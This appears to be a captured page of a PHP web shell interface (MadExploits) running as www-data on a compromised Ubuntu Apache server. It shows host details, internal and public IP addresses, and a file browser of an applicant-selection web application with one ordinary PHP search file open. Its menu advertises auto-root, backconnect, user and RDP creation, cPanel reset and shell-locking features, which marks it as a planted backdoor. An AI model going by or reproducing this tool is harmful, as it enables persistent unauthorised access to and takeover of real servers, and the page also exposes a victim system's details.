Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 18.218.137.69
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
applicantselection /
[ HOME SHELL ]
Name
Size
Permission
Action
111ajaxview.php
1.24
KB
-rw-r--r--
222report_indproduct_sale.php
4.05
KB
-rw-r--r--
ajaxapplicant.php
4.72
KB
-rw-r--r--
ajaxselection.php
2.88
KB
-rw-r--r--
applicant_callingpage.php
419
B
-rw-r--r--
applicant_editor.php
5.83
KB
-rw-r--r--
applicantselection.php
3.7
KB
-rw-r--r--
applicantselection_editor.php
2.9
KB
-rw-r--r--
applicantselection_list.php
6.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 111ajaxview.php
<?php session_start(); include("../common/functions.php"); include("../common/config.php"); if(isset($_POST['search'])){ $stmt = $conn->prepare("SELECT id, pname, mrp, purchaserate, salesrate, currqnty, salesdiscountrate FROM productlist WHERE pname LIKE :search LIMIT 0,15"); $stmt->bindValue('search', '%'.$_POST['search'].'%'); $stmt->execute(); $response = array(); while($row = $stmt->fetch()) { $response[] = array( "value"=>$row['id'], "label"=>$row['pname'], "mrp"=>$row['mrp'], "purchaserate"=>$row['purchaserate'], "salesrate"=>$row['salesrate'], "salesdiscountrate"=>$row['salesdiscountrate'], "currqnty"=>$row['currqnty'] ); } echo json_encode($response); } exit; ?>
Close